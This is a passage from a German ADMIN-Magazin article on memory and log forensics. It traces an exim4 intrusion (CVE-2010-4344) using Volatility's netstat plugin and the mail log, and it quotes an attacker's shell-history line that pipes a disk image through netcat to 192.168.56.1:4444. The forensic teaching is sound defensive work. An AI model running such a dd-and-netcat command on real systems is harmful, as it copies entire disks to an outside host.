Security ist ein stets aktuelles Thema in der IT. Deshalb widmet sich das ADMIN-Magazin 04/2012 speziell Sicherheitsaspekten und gibt Antworten auf die Fragen: ... (mehr)

Offene Verbindungen

Das Tool »netcat« wird typischerweise zum Übertragen von Daten über das Netzwerk verwendet. Deshalb besteht der nächste logische Schritt aus der Anzeige der aktiven Netzwerkverbindungen. Abbildung 4 zeigt die aktiven Netzwerkverbindungen des Systems. Für die Analyse wird jedoch der ursprüngliche Branch »linux-support« von Volatility für Linux verwendet, da das »netstat« -Plugin noch nicht im Branch Scudette implementiert ist.

Abbildung 4: Mithilfe von linux_netstat konnten im ursprünglichen Volatility alle aktiven Netzwerkverbindungen aufgelistet werden. Das Analyseplugin ist noch nicht in der neuen Codebasis verfügbar.

Wie man der Auflistung entnehmen kann, gibt es mehrere Verbindungen vom betroffenen System zu der IP-Adresse »192.168.56.1« . Zudem handelt es sich bei den Ports »4444« und »8888« um keine regulären Netzwerkdienste. Es liegt die Vermutung nahe, dass es sich um die IP-Adresse des Angreifers handeln könnte und dieser mithilfe von »netcat« versucht hat, Daten auf das System zu übertragen oder abzuziehen.

Die bisher gewonnenen Informationen lassen darauf schließen, dass es sich um einen erfolgreichen Angriff gehandelt hat. Deshalb soll im nächsten Schritt festgestellt werden, wie der Angreifer in das System eingedrungen ist. Dazu ist es sinnvoll, die Log-Dateien der Prozesse zu betrachten, die über das Netzwerk erreichbar sind.

Der Mail Transfer Agent »exim4« speichert seine Log-Datei im Verzeichnis »/var/log/exim« . Betrachtet man die Log-Datei »mainlog« , so findet man mehrere verdächtige Einträge: Der Log-Eintrag in Listing 1 zeigt beispielsweise den Versuch des Angreifers, eine E-Mail mit Shell-Befehlen an den Dienst »exim4« zu schicken. Ziel ist das Herunterladen und Ausführen der Datei »c.pl« . Untersucht man die restlichen verdächtigen Einträge, so stellt man fest, dass eine E-Mail erfolgreich verarbeitet wurde. Dabei ist die Datei »rk.tar« nachgeladen und ausgeführt worden.

Listing 1

Log-Eintrag

 

Basierend auf den Informationen aus der Log-Datei, stößt man bei der Recherche nach Angriffsmöglichkeiten für »exim4« auf die Schwachstelle »CVE-2010-4344« . Diese erlaubt es einem Angreifer, unter Ausnutzung eines Heap-Buffer-Overflows, beliebige Kommandos auf dem Zielsystem auszuführen.

Was lief ab?

Zuletzt ist es interessant herauszufinden, welches Ziel der Angreifer verfolgt hat. Die Verwendung von »netcat« zeigt, dass der Angreifer Kommandos auf dem betroffenen System eingegeben hat. Deshalb sollte die Shell-History der Benutzer des Systems untersucht werden. Die Zeile »dd if=/dev/sda1 | nc 192.168.56.1 4444« in der Datei »/root/.bash_history« offenbart, dass der Angreifer versucht hat, die Festplatte mit dem Werkzeug »dd« zu kopieren und mittels »nc« auf seinen Rechner zu übertragen.

Dieses Beispiel zeigt, wie man mithilfe der Arbeitsspeicheranalyse erste Erkenntnisse über einen möglichen Angriff gewinnen kann. Im Zusammenspiel mit der klassischen Festplatten-Forensik beschleunigt dies den investigativen Prozess ungemein, da der Forensiker weiß, wo er gezielt nach weiteren Spuren suchen muss. Dagegen reicht eine alleinige Analyse des flüchtigen Speichers selten aus, um eine erfolgreiche Kompromittierung des Systems festzustellen.

comments powered by Disqus

Artikel der Woche

Eigene Registry für Docker-Images

Wer selber Docker-Images herstellt, braucht auch eine eigene Registry. Diese gibt es ebenfalls als Docker-Image, aber nur mit eingeschränkter Funktionalität. Mit einem Auth-Server wird daraus ein brauchbares Repository für Images. (mehr)
Einmal pro Woche aktuelle News, kostenlose Artikel und nützliche ADMIN-Tipps.
Ich habe die Datenschutzerklärung gelesen und bin einverstanden.

Konfigurationsmanagement

Ich konfiguriere meine Server

  • von Hand
  • mit eigenen Skripts
  • mit Puppet
  • mit Ansible
  • mit Saltstack
  • mit Chef
  • mit CFengine
  • mit dem Nix-System
  • mit Containern
  • mit anderer Konfigurationsmanagement-Software

Google+

Ausgabe /2019